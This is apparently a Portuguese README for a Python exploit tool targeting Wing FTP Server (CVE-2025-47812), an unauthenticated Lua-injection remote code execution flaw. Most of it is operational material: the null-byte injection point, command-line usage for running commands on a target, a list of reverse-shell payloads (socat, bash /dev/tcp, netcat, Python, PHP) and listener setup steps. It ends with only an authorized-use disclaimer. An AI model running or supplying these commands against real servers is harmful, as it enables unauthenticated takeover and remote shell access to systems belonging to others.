
Exploit de execução remota de código não autenticada para o Wing FTP Server (CVE-2025-47812) com múltiplos payloads de reverse shell, modos interativo e CLI, e tratamento automatizado de sessões.
| Campo | Valor |
|---|
| CVE | CVE-2025-47812 |
| Afetado | Wing FTP Server < 7.4.4 |
| Tipo | Execução Remota de Código sem Autenticação |
| Pontuação CVSS | 10.0 (Crítico) |
| Corrigido em | Wing FTP Server 7.4.4 |
A vulnerabilidade existe no endpoint de login /loginok.html. O servidor não sanitiza bytes nulos (%00) no campo username. Isso permite que um atacante injete código Lua arbitrário em arquivos de sessão, que são posteriormente avaliados no lado do servidor quando endpoints como /dir.html são acessados — sem exigir nenhuma autenticação.
Referência: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload-o--timeout e --delay configuráveis-vCtrl+Cpip install requests
python3 wingftp_rce_exploit.py
# Executa um comando
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Salva a saída em arquivo
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (tenta todos os payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (payload específico)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url URL base do alvo
-U / --username Nome de usuário de login (padrão: anonymous)
-c / --command Comando a executar (modo comando)
-r / --rhost IP do seu listener (modo reverse shell)
-p / --rport Porta do seu listener (modo reverse shell)
--payload Payload específico a usar (veja a lista abaixo)
--timeout Timeout de requisição HTTP em segundos (padrão: 10)
--delay Atraso entre tentativas de payload em segundos (padrão: 4)
-o / --output Salvar saída do comando em arquivo
-v / --verbose Habilitar saída de debug
| Nome | Método |
|---|---|
socat | PTY completo via socat |
bash | Redirecionamento /dev/tcp |
python3 | Subprocesso de socket |
nc-e | Netcat com flag -e |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |
URL do alvo : http://192.168.1.10:5466
Usuário : anonymous
Opção : 1
Comando : whoami
Passo 1 — Inicie seu listener (socat recomendado para TTY completo):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
Ou com nc:
nc -lvnp 4444
Passo 2 — Execute o exploit:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
Esta ferramenta destina-se apenas a fins educacionais e a testes de segurança autorizados.
NÃO use contra sistemas que você não possui ou para os quais não tenha permissão explícita por escrito para testar.
O uso não autorizado é ilegal. Os autores não assumem responsabilidade pelo uso indevido.